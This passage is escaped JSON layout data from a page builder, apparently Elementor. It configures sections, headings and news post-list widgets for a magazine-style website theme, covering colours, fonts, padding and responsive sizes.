,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\